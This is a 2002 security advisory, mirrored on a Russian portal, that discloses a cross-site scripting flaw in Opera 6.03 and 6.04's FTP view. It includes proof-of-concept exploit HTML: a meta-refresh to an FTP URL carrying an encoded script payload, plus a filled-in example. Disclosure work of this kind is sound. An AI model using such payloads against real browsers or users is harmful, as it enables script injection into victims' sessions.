The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


Opera FTP View Cross-Site Scripting Vulnerability


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
Date: Tue, 6 Aug 2002 09:08:47 +0900
From: Eiji James Yoshida <[email protected]>
To: [email protected]
Subject: Opera FTP View Cross-Site Scripting Vulnerability

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


Title:
~~~~~~~~~~~~~~~~~
Opera FTP View Cross-Site Scripting Vulnerability

 
Date:
~~~~~~~~~~~~~~~~~
4 August 2002

 
Author:
~~~~~~~~~~~~~~~~~
Eiji James Yoshida [[email protected]]

 
Risk:
~~~~~~~~~~~~~~~~~
Medium

 
Vulnerable:
~~~~~~~~~~~~~~~~~
Windows2000 SP2 Opera 6.03
Windows2000 SP2 Opera 6.04

 
Overview:
~~~~~~~~~~~~~~~~~
Opera allows running Malicious Scripts due to a bug in 'FTP view'.
If you click on a malicious link, the script embedded in URL will run.

 
Details:
~~~~~~~~~~~~~~~~~
This problem is in 'FTP view'.
The '<title>URL</title>' is not escaped.

 
Exploit code:
~~~~~~~~~~~~~~~~~
<html>
<head>
<META http-equiv="Refresh" content="5 ; url=ftp://%3c%2ftitle%3e%3cscript%3ealert(%22exploit%22)%3b%3c%2fscript%3e@[FTPserver]/">
</head>
<body>
<script>window.open("ftp://&#091;FTPserver]/");</script>
</body>
</html>

Example:
<html>
<head>
<META http-equiv="Refresh" content="5 ; url=ftp://%3c%2ftitle%3e%3cscript%3ealert(%22exploit%22)%3b%3c%2fscript%[email protected]/">
</head>
<body>
<script>window.open("ftp://ftp.opera.com/");</script>
</body>
</html>

 
Demonstration:
~~~~~~~~~~~~~~~~~
http://www.geocities.co.jp/SiliconValley/1667/advisory04e.html

 
Workaround:
~~~~~~~~~~~~~~~~~
Disable JavaScript.

 
Vendor status:
~~~~~~~~~~~~~~~~~
Opera Software ASA was notified on 30 June 2002.
 

- -------------------------------------------------------------
Eiji "James" Yoshida
penetration technique research site
E-mail: [email protected]
URL: http://www.geocities.co.jp/SiliconValley/1667/index.htm
- -------------------------------------------------------------

-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.8ckt
Comment: Eiji James Yoshida

iQA/AwUBPU8TMjnqpMRtMot1EQJ1DwCgs1v96kQ5KN42NVjf3rjUQO6iWOMAoKEE
e1I1peQyP4eIEgAEIhMv+x67
=6Qcu
-----END PGP SIGNATURE-----



<< Previous INDEX Search src Set bookmark Go to bookmark Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2025 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру